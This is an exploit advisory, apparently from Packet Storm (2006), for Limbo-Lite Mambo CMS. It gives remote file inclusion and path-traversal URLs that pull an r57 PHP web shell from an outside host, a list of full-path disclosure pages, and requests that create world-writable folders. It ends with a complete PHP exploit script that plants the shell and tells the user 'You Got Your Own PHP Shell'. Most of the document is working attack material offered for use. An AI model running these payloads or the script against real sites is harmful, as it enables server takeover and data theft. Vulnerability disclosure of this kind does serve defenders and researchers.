limbolite.txt

2006-09-16T00:00:00
ID PACKETSTORM:50092
Type packetstorm
Reporter HACKERS PAL
Modified 2006-09-16T00:00:00

Description

                                        
                                            `Hello  
  
Title : Limbo - Lite Mambo CMS Multiple Vulnerabilities (Remote File including - Full path - make php shell - and create folder with 0777 permissions)  
  
Discovered by : HACKERS PAL  
Copyrights : HACKERS PAL  
Website : WwW.SoQoR.NeT  
Email : security@soqor.net  
  
/*******************************************************/  
Remote File Including  
  
classes/adodbt/sql.php?classes_dir=http://www.soqor.net/tools/r57.txt?  
  
/*******************************************************/  
  
Make online php shell  
  
admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://www.soqor.net/tools/r57.txt?  
or :-  
components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt?  
  
the shell link will be :   
admin/components/com_fm/lang/fm.english.php  
  
/*******************************************************/  
  
Full Path :-  
  
includes/metadata.php  
editor/tiny_mce/plugins/imanager/imanager.php  
components/com_fm/fm.install.php  
admin/auth.php  
admin/components/com_fm/fm.install.php  
admin/components/com_gallery/gallery.install.php  
admin/components/com_start/admin.start.news.php  
admin/components/com_start/admin.start.html.php?lm_absolute_path=../../../  
  
it can be usefull in the fallowing vulnerabilities  
  
/*******************************************************/  
Create A new Folder With 0777 Permission  
  
- - + You Can Change the link and create your own folders ,, see the source code ..  
  
admin/components/com_gallery/gallery.install.php?absolute_path=../../../  
  
File dir:  
images/gallery/thumbs/  
  
admin/components/com_gositemap/gositemap.install.php?lm_absolute_path=../../  
File dir:  
admin/feed  
  
admin/components/com_sitemap/sitemap.install.php?lm_absolute_path=../  
File dir:  
admin/components/feed  
  
/*******************************************************/  
  
WwW.SoQoR.NeT  
  
Exploit:-  
[code]  
#!/usr/bin/php -q -d short_open_tag=on  
<?  
/*  
/* Limbo Portal Multiple vulnerabilities  
/* This exploit should Create a PHP shell  
/* By : HACKERS PAL  
/* WwW.SoQoR.NeT  
*/  
print_r('  
/**********************************************/  
/* Limbo Portal Creat PHP shell exploit */  
/* by HACKERS PAL <security@soqor.net> */  
/* site: http://www.soqor.net */');  
if ($argc<2) {  
print_r('  
/* -- */  
/* Usage: php '.$argv[0].' host  
/* Example: */  
/* php '.$argv[0].' http://localhost/  
/**********************************************/  
');  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
  
$url=$argv[1];  
$exploit="components/com_fm/fm.install.php?lm_absolute_path=../../&install_dir=http://www.soqor.net/tools/r57.txt?";  
$page=$url.$exploit;  
Function get_page($url)  
{  
  
if(function_exists("file_get_contents"))  
{  
  
$contents = file_get_contents($url);  
  
}  
else  
{  
$fp=fopen("$url","r");  
while($line=fread($fp,1024))  
{  
$contents=$contents.$line;  
}  
  
  
}  
return $contents;  
}  
  
$page = get_page($page);  
  
if(!eregi("Warning",$page))  
{  
Die("\n[+] Exploit Finished\n[+] Go To : ".$url."admin/components/com_fm/lang/fm.english.php\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
Else  
{  
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
?>  
[/code]  
`